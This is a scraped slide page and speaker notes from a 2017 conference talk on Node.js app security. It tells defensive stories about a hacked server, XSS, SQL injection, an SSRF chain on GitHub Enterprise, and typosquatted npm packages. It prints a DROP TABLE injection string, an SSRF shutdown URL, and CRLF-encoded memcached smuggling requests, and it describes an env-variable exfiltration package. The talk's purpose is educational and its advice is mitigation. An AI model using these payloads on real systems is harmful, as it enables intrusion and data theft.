How to hack a node app? - LvivJS 2017

Download as PPTX, PDF

1 like646 views

This document contains links and snippets of code related to security topics such as Metasploit, dropping tables, SQL injection, chaining vulnerabilities, malicious npm packages, SQL string sanitization, and a security course on Pluralsight. It also includes photos and references to TV shows. There are tweets and messages from @jawache along with other usernames and links.

Technology

Asim Hussain
@jawache
codecraft.tv
microsoft.com

@jawachePhoto by Kristina Flour on Unsplash

@jawachePhoto by Veri Ivanova on Unsplash

@jawachePhoto by Nolan Issac on Unsplash

On Premise
Hardware
OS
App
IaaS
Hardware
OS
App
PaaS
Hardware
OS
App
@jawache

@jawacheIt's Always Sunny In Philadelphia

'SELECT * from COMPANIES where name =' + name;
@jawache

SELECT * from COMPANIES where name =;
DROPTABLE "COMPANIES";
--LTD
@jawache

@jawachePhoto by Braydon Anderson on Unsplash

git push
http://example.com
@jawache

git push
http://0:9200/_shutdown
@jawache

def send_email(request):
try:
recipients = request.GET['to'].split(',')
url = request.GET['url']
proto, server, path, query, frag = urlsplit(url)
if query: path += '?' + query
conn = HTTPConnection(server)
conn.request('GET',path)
resp = conn.getresponse()
...
@jawache

http://0:8000/composer/send_email?
to=orange@nogg&
url=http://127.0.0.1:12345/foo
@jawache

http://127.0.0.1:12345/%0D%0Ahello%0D%0AFoo:
@jawache

GET /%0D%0Ahello%0D%0AFoo:
HTTP/1.1
Host: 127.0.0.1:12345
Accept-Encoding: identity
@jawache

GET /
hello
Foo: HTTP/1.1
Host: 127.0.0.1:12345
Accept-Encoding: identity
@jawache

...:11211/%0D%0Aset%20key%200%20900%204%20data%0D%0A
@jawache

GET /
set key 0 900 4 data
HTTP/1.1
Host: 127.0.0.1:11211
Accept-Encoding: identity
@jawache

DeprecatedInstanceVariableProxy
@jawache

@jawachePhoto by Kelly Sikkema on Unsplash

@jawachePhoto by Jairo Alzate on Unsplash

Stop pretending
Don't assume
Small vulnerability
Don't trust anyone
PaaS
Sanitise
Fix
@jawache

https://www.pluralsight.com/courses/nodejs-security-
express-angular-get-started/ @jawache

Metasploit
https://www.metasploit.com/
DropTables Company
https://beta.companieshouse.gov.uk/company/10542519
SQLMap
http://sqlmap.org/
How I Chained 4 vulnerabilities on GitHub Enterprise - Orange Tsai
http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
Malicious packages in npm. Here’s what to do - Ivan Akulov
https://iamakulov.com/notes/npm-malicious-packages/
Oscar Bolmsten on Twitter
https://twitter.com/o_cee/status/892306836199800836

npm module sqlstring
https://www.npmjs.com/package/sqlstring
Exploit DB
https://www.exploit-db.com/
Brian Clarke Security Course on Pluralsight
https://www.pluralsight.com/courses/nodejs-security-express-angular-get-started/

How to hack a node app? - LvivJS 2017

1. Asim Hussain @jawache codecraft.tv microsoft.com

3. @jawache

4. @jawachePhoto by Kristina Flour on Unsplash

5. @jawachePhoto by Veri Ivanova on Unsplash

7. @jawacheMr Robot

8. @jawache

9. @jawachePhoto by Nolan Issac on Unsplash

10. On Premise Hardware OS App IaaS Hardware OS App PaaS Hardware OS App @jawache

11. @jawache

12. @jawacheIt's Always Sunny In Philadelphia

13. @jawache

14. 'SELECT * from COMPANIES where name =' + name; @jawache

15. SELECT * from COMPANIES where name =; DROPTABLE "COMPANIES"; --LTD @jawache

16. @jawache

17. @jawache

18. @jawachePhoto by Braydon Anderson on Unsplash

19. @jawache

20. @jawache

21. @orange_8361

22. git push http://example.com @jawache

23. git push http://localhost @jawache

24. git push http://0 @jawache

25. git push http://0:9200/_shutdown @jawache

26. def send_email(request): try: recipients = request.GET['to'].split(',') url = request.GET['url'] proto, server, path, query, frag = urlsplit(url) if query: path += '?' + query conn = HTTPConnection(server) conn.request('GET',path) resp = conn.getresponse() ... @jawache

27. http://0:8000/composer/send_email? to=orange@nogg& url=http://127.0.0.1:12345/foo @jawache

28. rn @jawache

29. %0D%0A @jawache

30. http://127.0.0.1:12345/%0D%0Ahello%0D%0AFoo: @jawache

31. GET /%0D%0Ahello%0D%0AFoo: HTTP/1.1 Host: 127.0.0.1:12345 Accept-Encoding: identity @jawache

32. GET / hello Foo: HTTP/1.1 Host: 127.0.0.1:12345 Accept-Encoding: identity @jawache

33. ...:11211/%0D%0Aset%20key%200%20900%204%20data%0D%0A @jawache

34. GET / set key 0 900 4 data HTTP/1.1 Host: 127.0.0.1:11211 Accept-Encoding: identity @jawache

35. code code @jawache

36. code code @jawache

37. DeprecatedInstanceVariableProxy @jawache

38. @jawache

40. @jawachePhoto by Kelly Sikkema on Unsplash

41. @jawache

42. @jawache

43. @jawache

45. @jawache

46. cross-env vs. crossenv @jawache

47. @jawachePhoto by Jairo Alzate on Unsplash

48. Stop pretending Don't assume Small vulnerability Don't trust anyone PaaS Sanitise Fix @jawache

49. https://www.pluralsight.com/courses/nodejs-security- express-angular-get-started/ @jawache

50. Asim Hussain @jawache codecraft.tv microsoft.com

51. Metasploit https://www.metasploit.com/ DropTables Company https://beta.companieshouse.gov.uk/company/10542519 SQLMap http://sqlmap.org/ How I Chained 4 vulnerabilities on GitHub Enterprise - Orange Tsai http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html Malicious packages in npm. Here’s what to do - Ivan Akulov https://iamakulov.com/notes/npm-malicious-packages/ Oscar Bolmsten on Twitter https://twitter.com/o_cee/status/892306836199800836

52. npm module sqlstring https://www.npmjs.com/package/sqlstring Exploit DB https://www.exploit-db.com/ Brian Clarke Security Course on Pluralsight https://www.pluralsight.com/courses/nodejs-security-express-angular-get-started/

Editor's Notes

#2: before I begin I'd like to ask a quick question... pee question hopefully, by the end of the talk, that %age will have increased. because today we are going to talk about security and hacking. and Introduce To begin I'd like to tell you a story...
#3: events site side project working in investment banking, career going well, good money quit to work on this full time arrogant money started running out, had 3 months left. found one investor still interested demo 7 days 48 hours linode investigate, confirmed, tmp folder what was the source? found php running, weird since I don't use php remembered resolution
#4: I had read up on security. followed all the instructions, locked down root access. each process had a separate user account firewalls. fail2ban. done everything that I thought i needed to, but they still got in. I don't think i did anything really stupid, so if it can happen to me it can happen to anyone. So today I'm going to talk about hacking. But through 4 different hacking stories. Some specific to node Some general. Each story has a moral at the end a lesson to learn and some steps you can take to protect yourself. Lets start off with breaking down exactly how I think I was hacked at eventsushi.
#5: Lets first explain a few terms A vulnerability is a hole in security a weakness - e.g. not using a firewall is a vulnerability. An exploit is a tool, piece of code, or just a sequence of commands which takes advantage of a vulnerability to do bad things. Q) Who here has heard of the term 0 day exploit? A 0 day exploit is one that no one knows about, yet. It's a secret whitehat hackers and blackhat hackers. blackhat - personal gain, considered the bad guys, find a zero day might sell it to criminal organisations etc.. whitehat - good guys, security exports, employed by companies to find holes in security and plug them, find a zero day they tell the company in private and let them fix it. Photo by Kristina Flour on Unsplash https://unsplash.com/search/photos/whisper?photo=BcjdbyKWquw
#6: As soon as a white hat hacker inform a company of the 0 day exploit it becomes known, becomes public. It's not called a 0 day exploit anymore. Then the clock starts ticking. How hard do you think it would be to get a hold of a 0 day exploit? How hard do you think it would be to get a hold of an exploit that's been in the public domain for 6 months? https://unsplash.com/photos/p3Pj7jOYvnM Photo by Veri Ivanova on Unsplash
#7: In fact it's very easy. There are lots of sites which contain lists of exploits This one for instance https://www.exploit-db.com/ [SHOW VIDEO]
#8: We think the hackers are like this... Black hat... mysterious... computer geniuses In fact why would one of these people even bother? I'm a small startup who's losing money. They were not after money. Or my data. They were just using me as a server from which to launch other attacks. I was just a "node" to them They didn't care that linode was gonna shut me down. That I was gonna lose everything. I don't believe the people that got onto my server were genius black hat hackers They didn't use a 0 day exploit. I was running a really old version of PHP. My attacker GOOGLED how to hack me and followed instructions. Not hard!
#9: Or like this... ooooh mysterious....
#10: http://www.istockphoto.com/gb/photo/hard-at-work-gm518069822-89813857 But it probably looked like this... But I was running an old version of PHP. My attacker GOOGLED how to hack me and followed instructions.
#11: In fact it's even easier than that.. you don't even need to do this manually. tools automate this whole process metasploit is one from rapid7. scans a site. identifies potential vulnerabilities. then lets you automate exploits from its database of plugins. So you just need to find an idiot like me on the internet With an old version of PHP running Scan me with metasploit and then try a few known exploits.
#12: So what can we do? We are still vulnerable to 0 day exploits. Can't defend from unknown. Can defend from known exploits simply by keeping our software updated. That's easy right, we just need to update... OS Apache Nginx Database Software Underlying Libraries Bulletins Actually that sounds like a lot of hard work Any my job is to write apps, not maintain servers. So after this attack i started exclusively using PAASs Photo by Nolan Issac on Unsplash https://unsplash.com/photos/K5sjajgbTFw
#13: Describe. Patching Companies Leaving an OLD version of PHP running was a vulnerability. Don't think they came in through a 0 day. They came in using a known exploit, one that was probably already fixed in the latest version of PHP. So if i had at least updated PHP to the latest version I would be safe. But keeping everything updated is hard. So use a PAAS. On Premise You look after hardware, OS and application code IaaS You look after OS and App code and they look after the Hardware PaaS They look after harware, OS (and software like web servers) and you just release app code In the past i've used Heroku, Google App Engine, Amazon has something called Beanstalk but i've never used it and Azure has something called AppService Doesn't matter which one you use to be honest, they all auto update the infrastructure versions on a pretty regular level just make sure to use one.
#14: Azure Security Centre Coolest things about Azure No one else has got this. Signals Alerts create noise So to solve this we trained in AI to detect hacking attempts from the signals. The AI can chain together signals and figure out if you are being attacked with a pretty high degree of certainty. It's not perfect but i'm lazy and it doesn't require any effort to use so I like to switch it on.
#15: Who watches this show? So my closing arguments. Thinking you can create a secure platform to host your app when you are not a security expert, is like thinking you can represent yourself in court if you are not a layer. Next Streps: Use a PaaS. Did I manage to scare any of you? Probably not... maybe this next story will scare you more.
#16: http://www.istockphoto.com/gb/photo/little-boy-stealing-cookies-gm164114602-23379436 http://www.istockphoto.com/gb/photo/close-up-of-a-little-girl-taking-one-cookie-gm160146392-17820916 This story is about a company I used to work at. They were a financial startup. Brought to help them move from an old Java framework to Angular. Framework decommissioned in 2003, first line of code was written in 2005. Can laugh but It's financial services so lots of it regulation including security. Hired a pen testing firm to try to hack us. It wasn't hard. This is the story of one of the vulnerabilities they found. It's called XSS or CrossSiteScripting and it's a type of Injection Attack. They basically found a way to steal a users cookies then login and make trades and financial transactions as that user.
#17: The way they did this was simple. The form that we used to submit a comment allowed some simple formatting, bold etc.. It used HTML to define the text format.
#18: It then converted the HTML to Base64 and this was posted to the server and stored in the database. Later on when it comes to display it converts from base64 on the server side and returns HTML from the server. NOTE: This is NOT an SPA, serverside rendered!
#19: So instead of the HTML you saw before, these hackers crafted their own HTML comment. This one had a script tag. Do you see what it's doing? It's sending your cookie to some other server, assuming you login with cookies this is giving someone else complete access to your account.
#20: Remember it gets converted to base64 first and they just used postman to post it to our APIs. Then when we rendered the page later on. We rendwered it WITH their script tag!
#21: So just VIEWING a forum page with one of these special comments in will send your cookie to someone else server.
#22: http://www.istockphoto.com/gb/photo/deception-concept-disguise-between-shark-and-goldfish-gm534192884-94746997 http://www.istockphoto.com/gb/photo/in-the-wrong-place-gm92469124-700142 https://www.pexels.com/photo/close-up-of-human-hand-257279/ Moral of the story: Don't assume your inputs will arrive in the format you expect. What's the solution? Sanitise on backend - on the serverside should strip tags it doesnt' recognise: https://www.npmjs.com/package/xss [ADD] Sanitise on frontend: With frameworks like Angular it by default assumes that all content is unstrusted and runs it through a sanitiser removing all script tags: https://angular.io/guide/security CSP script-src https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src [CSP]
#23: http://www.istockphoto.com/gb/photo/child-upset-before-getting-a-shot-at-the-doctor-gm97506563-12206370
#24: https://beta.companieshouse.gov.uk/company/10542519 companies house. This is an actual limited company registered in the UK. It's an example of an attempt at an injection attack a sql injection attack. Run untrusted code in a trusted environment. The goal is to trick an application to run some raw SQL.
#25: So if someone wasn't careful and had a script that ran something like this 'select * from companies where name ='+ name;
#26: they would end up running something like this But in other use cases name might be something a user entered into a form, or came from an API request. You are susceptible to this whenever you use "untrusted" input in an SQL statement. backup database, so what DROPTABLES isn't the only command Don't even have to try all these commands manually.
#27: http://sqlmap.org/ It's such a common vulnerability that there are automated tools to help you attack, such as this one.
#28: python script scans to begin with, finding out things like database software and version. try to guess the admin password from a database of passwords. dump users table run shell commands In about a min, we can get access to the database, dump the users table and even run commands on the OS shell.
#29: Moral of the story: Don't assume your inputs will arrive in the format you expect. Photo by Braydon Anderson on Unsplash https://unsplash.com/collections/480109/animals-in-disguise?photo=wOHH-NUTvVc
#30: What's the solution? Sanitise: sqlstring Strips out anything that looks unsafe from a sql statement. Others, front end, XSS etc... Anytime you have untrusted input from a user sanitise.
#31: If you use something like azure sql database it automatically ❤️ detects sql injection attacks doesn't stop them but does send you an alert. How are you feeling now? I showed you an automated script which took over a database in under a minute. More scared?
#32: Who's heard of this company? So github has a bug bounty. They pay you if you find a security hole in their software. This is a great write up of an exploit found in github enterprse by someone called orange tsai gave a hacker the ability to run any command on the github server as if they have a bash shell open on your server. chaining a number of smaller exploits together into one large exploit. heist movie I think its a facinating story which I've tried to break down for you and would love to tell. http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
#33: You know webhooks right? You can setup a webhook so that when someone pushes to git it will POST to a HTTP endpoint.
#34: What if you set the webhook URL to localhost? Aha... then it will call a local process instead! But the github people knew this They USED a sanitiser that blacklisted localhost.
#35: But they didn't blacklist 0 which can resolve to localhost as well! contain a port number as well We ca make a post request to any port on the local machine
#36: About the only thing he could do with that is shutdown elastic search.
#37: graphite charting open source so checked the source code found this function
#38: POST -> GET
#39: But that second GET request is using HttpConnection lib Which is know to have a vulnerability called called CR-LF Injection
#43: Lets us smuggle protocols
#44: This activity opens up the door to something called protocol smuggling. So if we send a HTTP request to the redis instance on the box (6379) with the command SLAVEOF example.com 6379 then this redis instance becomes a slave of our external redis instance. So it opens the door to being attacked through other protocols than HTTP. What other things can we do?
#45: set key 0 900 4 data Recognise that port number? memcache key-value listing all the keys automatic serialisation of an object in memory, instance to memcached
#46: Lets us smuggle protocols
#47: [CHANGE RUBY] So you take some code that exists in memory. Convert it to a string or binary format. Send that to memcached. Sometime later load the data again, convert it into a class and call a function.
#48: But now we have access to memcached We can list keys get data from memcache but also set data we can CHANGE what code is returned. So when you execturte that code later on, you are running my code, not the code you stored.
#49: Serialised instances contain the name of the class Found this one Instance had a known vulnerability so was depreciated You can change a serialised instance of this class so that when it is called it executes a command in the shell instead. BUT they still used it, so it was easy to hack.
#52: Moral of the story: Big exploits are made from smaller exploits. Attacks don't come in through one big exploit. Multiple smaller exploits chained together. So if you found a vuln and are thinking of ignoring it, think again. How are you feeling now? Anyone need to go to the toilet? No? Maybe after the next story... Photo by Kelly Sikkema on Unsplash https://unsplash.com/search/photos/lego?photo=JRVxgAkzIsM
#53: What does the above code do? It gets all your environment variables and converts them to a base64 encoded string.
#54: What does the above code do? Take a look at the host name. It takes your environment variables and posts them to my server. How many of you keep secret keys, passwords etc... in environment variables. What if I told you I could make you run this code on your server?
#55: Does this make it any clearer, the file is called package-setup.js
#56: How about now? I can see the realisation coming to some of you. This is an npm module, when you install it you send me your environment variables. But you are probably thinking, why would you ever install an npm package you have never heard of?
#57: Take a look at this, was posted a few weeks ago. cross-env is a very popular npm module created by kent dodds, over a million downloads every month.
#58: What they had done was release a module called codeenv without the hyphen. That's it. It's called typosquatting. npm install from memory, tried with and without hyphens? When you run npm install you are basically giving other developers the right to run their code on your server behind all your firewalls as if you wrote the code.
#59: Moral of the story: We are too trusting! maybe because open source. developer is a good person. they have released code to the community for free. multiple eyes on it. the npm modules were up for 2 weeks before they were discovered. not using the environment key vault. but even that would not be safe the code is running as if it was you who wrote it. so it will have access to even read from keyvault npm have taken down crossenv maybe already installed? Links at the end. ecosystem is HUGE static analysis of npm packages double triple sure you typed he module name correctly https://unsplash.com/photos/sssxyuZape8 Photo by Jairo Alzate on Unsplash
#60: What's the takeaway? Stop pretending that because you've spent a few mins thinking about security that you are safe. There are people who spend all day everyday thinking of clever ways to get access to your site. Use a PaaS. Don't assume people will use your site as you expect them to use it, every input can be abused, be it an XSS on the client side or a sql injection attack or something more complex. Every input the user provides can be aboves, so sanitise, use CSP headers... whatever.. No such thing as a small exploit, small ones can be chained together to create a big one. Fix your vulnerabilities no matter how small you think they are. Did the npm one scare you? It should... we are too trusting, we trust objects we store in a memcache are not going to be tampered with, we trust that everything we install from npm is trustworthy. Don't trust anyone!
#61: If you want a good follow on course my colleage Brian Clarke has one on Pluralsight, it's a good one for going a bit deeper into some of these issues.
#62: look like from behind

How to hack a node app? - LvivJS 2017

More Related Content

What's hot (7)

Similar to How to hack a node app? - LvivJS 2017 (20)

Recently uploaded (20)

How to hack a node app? - LvivJS 2017

Editor's Notes